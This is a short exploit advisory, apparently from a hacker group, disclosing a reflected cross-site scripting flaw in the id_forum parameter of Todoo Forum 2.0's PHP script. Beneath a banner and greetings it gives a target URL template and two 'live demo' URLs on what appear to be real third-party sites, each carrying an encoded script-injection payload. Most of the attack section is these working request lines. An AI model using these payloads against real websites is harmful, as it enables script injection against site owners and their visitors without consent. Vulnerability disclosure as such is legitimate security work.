Todoo Forum version 2.0 suffers from a cross site scripting vulnerability.
7f613914d8d400a741784ec5f325fc9cfc791cfa19ebddcbe742f0c33f0dc40b
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Todoo Forum 2.0 [xss] Cross Site Scripting Vulnerability
==============================================================================
[»] Script: [ Todoo Forum ]
[»] Language: [ PHP ]
[»] Site page: [ Todooforum est un forum entiérement personnalisable et intégrable ]
[»] Download: [ http://www.todoomasters.com/scripts/todooforum.zip ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] http://[target].com/[path]/todooforum.php?cat=post&id_forum=[Xss Vuln]
===[ Live Demo ]===
[»] http://membres.multimania.fr/ps2foreverall/forum/forum.php?cat=post&id_forum=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
[»] http://aslg.aslpaintball.fr/forum/forum.php?cat=post&id_forum=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Author: ViRuSMaN <-
###########################################################################
________________________________
Windows Live: Keep your friends up to date with what you do online.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_1:092010>